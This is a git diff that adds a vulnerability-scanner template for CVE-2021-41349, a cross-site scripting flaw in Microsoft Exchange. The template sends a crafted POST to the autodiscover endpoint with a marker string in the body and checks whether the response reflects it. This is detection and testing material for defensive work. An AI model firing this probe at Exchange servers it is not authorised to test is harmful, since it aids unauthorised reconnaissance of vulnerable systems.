diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
new file mode 100644
index 0000000000..d5bde0fdbd
--- /dev/null
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -0,0 +1,20 @@
+id: Exchange XSS
+
+info:
+  name: Exchange XSS
+  author: @rootxharsh, @iamnoooob
+  severity: medium
+requests:
+  - raw:
+      - |
+        POST /autodiscover/autodiscover.json HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+
+        <HTTPVOID>&x=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "<HTTPVOID>")'